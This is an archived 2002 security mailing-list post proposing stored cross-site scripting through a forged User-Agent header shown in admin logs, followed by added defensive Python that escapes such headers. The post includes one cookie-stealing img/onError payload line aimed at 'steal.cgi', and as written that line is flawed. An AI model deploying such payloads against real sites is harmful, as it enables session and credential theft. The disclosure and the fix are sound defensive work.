XSS And Headers...
From: lok lok (itslok@hotmail.com)
Date: 05/25/02
- Previous message: Blue Boar: "game console hacking thread"
- Next in thread: Roland Postle: "Re: XSS And Headers..."
- Reply: Roland Postle: "Re: XSS And Headers..."
- Reply: zeno: "Re: XSS And Headers..."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "lok lok" <itslok@hotmail.com>
To: security-basics@security-focus.com, bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Date: Sat, 25 May 2002 14:01:10 +1000
There used to be a lot of discussion about XSS, cross-site scripting, where
you can insert HTML into pages that are viewed by many people and steal info...
Most of these sites (e.g. a bulletin board) have been updated to protect
against this behaviour...
However, I've noticed that many do not cover headers..
e.g.
HTTP_USER_AGENT may be logged or stored somewhere when you sign up to
website "abc". The administrator, or whoever, will check over your account
and see your browser type...
Normally it would contain something like... Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; .NET CLR 1.0.3705)
..
But with a proxy prog (I use Proxomitron) you can change it to whatever you
like..
For example: <img src="x.jpg" onError="this.src='steal.cgi?document.cookie';">
And if the site logs it, you just got the administrator's password :)
Now, I'm yet to come across any sites that this works on because I just
thought of it this afternoon, but let me know if it works :) In any case, a
lot of sites would log/store this kind of information, so it should be fixed.
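The fix the post calls for, as an added example that is not part of the original message: an admin log viewer that HTML-escapes the stored User-Agent before embedding it in the page, shown beside the unsafe rendering, plus a check that flags rendered cells still holding raw markup. The log entries, column layout and function names are constructed for the example.

```python
import html
import re

# Constructed sample of what a sign-up log might hold: one ordinary browser
# string and one User-Agent carrying the markup from the post above.
SAMPLE_LOG = [
    {"user": "alice",
     "ua": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"},
    {"user": "mallory",
     "ua": "<img src=\"x.jpg\" onError=\"this.src='steal.cgi?document.cookie';\">"},
]


def render_row_unsafe(entry):
    """The pattern the post warns about: a header value pasted straight into HTML.
    Whatever the client sent is now part of the page the administrator views."""
    return f"<tr><td>{entry['user']}</td><td>{entry['ua']}</td></tr>"


def render_row_safe(entry):
    """Hardened version: every field that originated from the client, headers
    included, is escaped (quotes too) so the browser shows it as text only."""
    user = html.escape(entry["user"], quote=True)
    ua = html.escape(entry["ua"], quote=True)
    return f"<tr><td>{user}</td><td>{ua}</td></tr>"


_CELL = re.compile(r"<td>(.*?)</td>", re.DOTALL)


def rows_with_raw_markup(rendered_rows):
    """Output-side check for a log viewer: return the indices of rows whose
    cell content still contains an unescaped '<', i.e. markup that survived
    into the page instead of being escaped. Useful as a regression test."""
    flagged = []
    for i, row in enumerate(rendered_rows):
        if any("<" in cell for cell in _CELL.findall(row)):
            flagged.append(i)
    return flagged


if __name__ == "__main__":
    unsafe = [render_row_unsafe(e) for e in SAMPLE_LOG]
    safe = [render_row_safe(e) for e in SAMPLE_LOG]
    print("unsafe rows with raw markup:", rows_with_raw_markup(unsafe))
    print("safe rows with raw markup:  ", rows_with_raw_markup(safe))
```

The same escaping has to be applied anywhere else the stored value is shown (e-mail digests, CSV exports opened as HTML), since the header is attacker-controlled on every request.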